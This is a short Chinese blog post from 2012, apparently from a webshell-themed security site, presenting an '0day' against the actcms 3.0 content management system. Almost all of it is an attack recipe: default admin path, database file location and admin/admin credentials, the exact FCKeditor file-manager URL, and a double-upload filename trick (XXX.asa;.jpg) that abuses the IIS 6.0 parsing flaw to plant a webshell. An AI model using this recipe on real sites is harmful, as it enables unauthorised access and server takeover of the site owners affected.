actcms网站管理系统漏洞0day

分类:安全 | 2012-06-5 | 撸过 242 次
0人扯谈

漏洞版本:actcms3.0以下版本
默认后台路径:admin/
默认数据库:App_Data/DataBase.mdb
默认账户:admin
默认密码: admin
利用点:FCK编译器
漏洞界面:
admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=%2Fadmin%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx
利用FCK 2次上传
可上传XXX.asa;.jpg类型
上传后会变成XXX_asa;.jpg
再次上传XXX.asa;.jpg
即可成为XXX.asa;(1).jpg
利用IIS6.0解析漏洞即可拿到webshell

本站内容均为原创,转载请务必保留署名与链接!
actcms网站管理系统漏洞0day:https://www.webshell.cc/3674.html

随机日志